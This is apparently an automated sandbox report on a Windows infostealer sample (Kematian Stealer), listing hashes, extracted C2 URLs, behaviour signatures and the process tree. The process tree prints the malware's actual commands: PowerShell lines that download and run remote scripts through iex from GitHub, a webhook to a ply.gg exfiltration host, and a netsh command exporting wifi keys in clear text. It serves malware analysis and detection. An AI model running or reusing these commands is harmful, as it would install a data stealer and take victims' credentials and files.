Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14/07/2024, 23:10
Static task
static1
Behavioral task
behavioral1
Sample
main (1).exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
main (1).exe
Resource
win10v2004-20240709-en
General
-
Target
main (1).exe
-
Size
89KB
-
MD5
755ee27c14914293c29ce91be08c20df
-
SHA1
cd4b0c9f25261d59689416734f9495a0c30bde17
-
SHA256
f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de
-
SHA512
a250ef4af67d0b5cb4d671ae72f689fcfc4704c0ce99768a7408e0824b1465f9e94e9027f8e6b2855bc0dfe4201deca85333809d34fad617e7ab411c7e10540c
-
SSDEEP
1536:R97fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfBweOy:Rp7DhdC6kzWypvaQ0FxyNTBfBt
Malware Config
Extracted
https://full-recording.gl.at.ply.gg:14817/data
Extracted
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1
Extracted
https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1
Signatures
-
Blocklisted process makes network request 10 IoCs
flow pid Process 2 1128 powershell.exe 15 1128 powershell.exe 17 1128 powershell.exe 23 1412 powershell.exe 24 1412 powershell.exe 26 1412 powershell.exe 28 2256 powershell.exe 29 2256 powershell.exe 30 2256 powershell.exe 32 1128 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 1 raw.githubusercontent.com 2 raw.githubusercontent.com 24 raw.githubusercontent.com 29 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 1412 powershell.exe 1412 powershell.exe 1128 powershell.exe 1128 powershell.exe 2256 powershell.exe 2256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1128 powershell.exe Token: SeIncreaseQuotaPrivilege 1128 powershell.exe Token: SeSecurityPrivilege 1128 powershell.exe Token: SeTakeOwnershipPrivilege 1128 powershell.exe Token: SeLoadDriverPrivilege 1128 powershell.exe Token: SeSystemProfilePrivilege 1128 powershell.exe Token: SeSystemtimePrivilege 1128 powershell.exe Token: SeProfSingleProcessPrivilege 1128 powershell.exe Token: SeIncBasePriorityPrivilege 1128 powershell.exe Token: SeCreatePagefilePrivilege 1128 powershell.exe Token: SeBackupPrivilege 1128 powershell.exe Token: SeRestorePrivilege 1128 powershell.exe Token: SeShutdownPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeSystemEnvironmentPrivilege 1128 powershell.exe Token: SeRemoteShutdownPrivilege 1128 powershell.exe Token: SeUndockPrivilege 1128 powershell.exe Token: SeManageVolumePrivilege 1128 powershell.exe Token: 33 1128 powershell.exe Token: 34 1128 powershell.exe Token: 35 1128 powershell.exe Token: 36 1128 powershell.exe Token: SeIncreaseQuotaPrivilege 1128 powershell.exe Token: SeSecurityPrivilege 1128 powershell.exe Token: SeTakeOwnershipPrivilege 1128 powershell.exe Token: SeLoadDriverPrivilege 1128 powershell.exe Token: SeSystemProfilePrivilege 1128 powershell.exe Token: SeSystemtimePrivilege 1128 powershell.exe Token: SeProfSingleProcessPrivilege 1128 powershell.exe Token: SeIncBasePriorityPrivilege 1128 powershell.exe Token: SeCreatePagefilePrivilege 1128 powershell.exe Token: SeBackupPrivilege 1128 powershell.exe Token: SeRestorePrivilege 1128 powershell.exe Token: SeShutdownPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeSystemEnvironmentPrivilege 1128 powershell.exe Token: SeRemoteShutdownPrivilege 1128 powershell.exe Token: SeUndockPrivilege 1128 powershell.exe Token: SeManageVolumePrivilege 1128 powershell.exe Token: 33 1128 powershell.exe Token: 34 1128 powershell.exe Token: 35 1128 powershell.exe Token: 36 1128 powershell.exe Token: SeIncreaseQuotaPrivilege 1128 powershell.exe Token: SeSecurityPrivilege 1128 powershell.exe Token: SeTakeOwnershipPrivilege 1128 powershell.exe Token: SeLoadDriverPrivilege 1128 powershell.exe Token: SeSystemProfilePrivilege 1128 powershell.exe Token: SeSystemtimePrivilege 1128 powershell.exe Token: SeProfSingleProcessPrivilege 1128 powershell.exe Token: SeIncBasePriorityPrivilege 1128 powershell.exe Token: SeCreatePagefilePrivilege 1128 powershell.exe Token: SeBackupPrivilege 1128 powershell.exe Token: SeRestorePrivilege 1128 powershell.exe Token: SeShutdownPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeSystemEnvironmentPrivilege 1128 powershell.exe Token: SeRemoteShutdownPrivilege 1128 powershell.exe Token: SeUndockPrivilege 1128 powershell.exe Token: SeManageVolumePrivilege 1128 powershell.exe Token: 33 1128 powershell.exe Token: 34 1128 powershell.exe Token: 35 1128 powershell.exe Token: 36 1128 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 3724 wrote to memory of 4884 3724 main (1).exe 85 PID 3724 wrote to memory of 4884 3724 main (1).exe 85 PID 4884 wrote to memory of 2600 4884 cmd.exe 86 PID 4884 wrote to memory of 2600 4884 cmd.exe 86 PID 2600 wrote to memory of 3508 2600 net.exe 87 PID 2600 wrote to memory of 3508 2600 net.exe 87 PID 4884 wrote to memory of 456 4884 cmd.exe 88 PID 4884 wrote to memory of 456 4884 cmd.exe 88 PID 456 wrote to memory of 1128 456 mshta.exe 90 PID 456 wrote to memory of 1128 456 mshta.exe 90 PID 1128 wrote to memory of 3148 1128 powershell.exe 96 PID 1128 wrote to memory of 3148 1128 powershell.exe 96 PID 1128 wrote to memory of 1412 1128 powershell.exe 97 PID 1128 wrote to memory of 1412 1128 powershell.exe 97 PID 1128 wrote to memory of 2256 1128 powershell.exe 98 PID 1128 wrote to memory of 2256 1128 powershell.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\main (1).exe"C:\Users\Admin\AppData\Local\Temp\main (1).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""2⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:2600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:3508
-
-
-
C:\Windows\system32\mshta.exemshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2256
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5abc27673d9c940ad74b41c58391d2412
SHA19a31a521a521dcd0f974ce6f7a50aecc69a50df0
SHA256cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
SHA512c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4
-
Filesize
707B
MD5c11ddd77e6fd87bfd91da46629012670
SHA1d72617510c45e258583ad25801c92b97152bb2b9
SHA256243627dc5cc3254b95baeaa0fff9e11c377125a587788abf7aa408129550fef7
SHA5128eca3612c655f7c1054a993525689f34ac7f777b357e0a2ec48f4786aaba345c594eb7a306630eaed6739e1bc970054b0db279adb7c143da87f19fcd7519d411
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4B
MD537a6259cc0c1dae299a7866489dff0bd
SHA12be88ca4242c76e8253ac62474851065032d6833
SHA25674234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
SHA51204f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d